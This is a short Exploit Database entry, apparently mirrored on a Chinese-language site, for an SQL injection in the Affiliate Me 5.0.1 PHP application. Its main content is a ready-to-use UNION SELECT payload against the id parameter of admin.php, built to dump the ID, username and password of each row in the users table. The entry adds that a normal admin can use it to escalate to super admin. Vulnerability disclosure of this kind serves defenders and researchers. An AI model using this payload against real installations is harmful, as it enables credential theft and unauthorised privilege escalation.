Affiliate Me Version 5.0.1 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： h4ck3r
  日期： 2023-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51468/

• [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
  [#] Exploit Date: May 16, 2023.
  [#] CVSS 3.1: 6.4 (Medium)
  [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
  [#] Tactic: Initial Access (TA0001)
  [#] Technique: Exploit Public-Facing Application (T1190)
  [#] Application Name: Affiliate Me
  [#] Application Version: 5.0.1
  [#] Vendor: https://www.powerstonegh.com/
  
  
  [#] Author: h4ck3r - Faisal Albuloushi
  [#] Contact: SQL@hotmail.co.uk
  [#] Blog: https://www.0wl.tech
  
  
  [#] Exploit:
  
  [path]/admin.php?show=reply&id=[Injected Query]
  
  
  [#] 3xample:
  
  [path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
  
  
  [#] Notes:
  - A normal admin can exploit this vulnerability to escalate his privileges to super admin.